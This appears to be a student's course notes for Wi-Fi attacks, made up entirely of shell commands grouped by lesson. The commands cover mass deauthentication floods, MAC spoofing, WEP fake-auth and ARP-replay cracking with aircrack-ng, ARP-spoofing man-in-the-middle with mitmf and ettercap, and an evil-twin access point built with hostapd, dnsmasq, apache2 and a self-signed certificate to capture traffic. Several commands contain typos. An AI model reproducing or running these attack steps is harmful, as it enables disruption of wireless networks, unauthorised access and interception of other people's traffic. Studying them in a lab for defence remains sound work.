1) airodump-ng --channel 11 --bssid 64:7C:34:A4:BB:B2

2) aireplay-ng --deauth 100000 -a 64:7C:34:A4:BB:B2 -c 00:21:27:FD:61:06 mon0

3) aireplay-ng --deauth 100000 -a 64:7C:34:A4:BB:B2 -c 00:21:27:FD:61:06 mon0 &> /dev/null $

4) jobs

5) killall aireplay-ng 

6) kill %1

Section - 3 (Gaining Access) 

1) airodump-ng --bssid 64:16:F0:EC:7B:F3 --channel 6 mon0 

2) aireplay-ng --deauth 4 -a 64:16:F0:EC:7B:F3 -c 80:E6:50:22:A2:E8 mon0 

v-12

3) airmon-ng stop wlan0mon

or 

3) iwconfig mon0 mode managed 

4) service network-manager start 


v-13)

5) airodump-ng mon0

6) airodump-ng --bssid 64:16:F0:EC:7B:F3 --channel 6 mon0 

7) ifconfig wlano down 

8) macchanger -m 80:E6:50:22:A2:E8 wlan0 

v-14)

9) airodump-ng mon0 

10) airodump-ng --bssid 00:10:18:90:2D:EE --channel l --write ska-test mon0

11) aireplay-ng --fakeauth 0 -a 00:10:18:90:2D:EE -h 00:C0:CA:82:82:98 mon0 

12) ifconfig mon0 

13) airodump-ng --bssid 00:10:18:90:2D:EE --channel 1 --write ska-test2 mon0 

14) aireplay-ng --arpreplay -b 00:10:18:90:2D:EE -h 80:E6:50:22:A2:E8 mon0 

15) aircrack-ng ska-test2-01.cap

Section -4 

1) ifconfig 

2) ifconfig wlan0 down 

3) iwconfig wlan0 mode monitor 

4) ifconfig wlan0 up

5) airodump-ng wlan0 

6) airodump-ng --bssid 50:C7:BF:ED:6B:12 --channel 12 --write airport wlan0 

7) wireshark 

v-17)

8) mitmf --arp --spoof -i wlan0 --gateway 192.168.2.1 

9) route -n 

10) ettercap -Tq -M arp:remote -i wlan0 ///

11) q // quit wireshark using quit in the keyboard 

v-18)

 Nothing 

v-19)

12) service apache2 start 

13)apt-get install geany

v-23)

14) apt-get install hostapd dnsmasq

15) ifconfig 

16) service network-manager stop

v-24)

17) dnsmasq -C /root/downloads/fake-ap/dnsmasq.conf 

18) hostapd /root/Downloads/fake-ap/hostapd.conf -B 

19) ifconfig wlan0 10.0.0.1 netmask 255.255.255.0

20) service apache2 start

v-25)

21) leafpad /etc/apache2/sites-enabled/000-default.conf 

22) service apache2 restart 

v-26)

23) openssl req -new -x509 -days 365 -out /root/Downloads/fake-ap/cert.pem -keyout /root/Downloads/fake-ap/cert.key                               

v-27)

24) a2enmod ssl 

25) leafpad /etc/apache2/sites-enabled/00-default.conf 

26) leafpad /etc/apache2/ports.conf 


v-28)

1) hostpad /root/Downloads/fake-ap/hostapd.conf -B 

2) tshark -i wlan0 -w royal-wifi.cap

3) wireshark 

4)


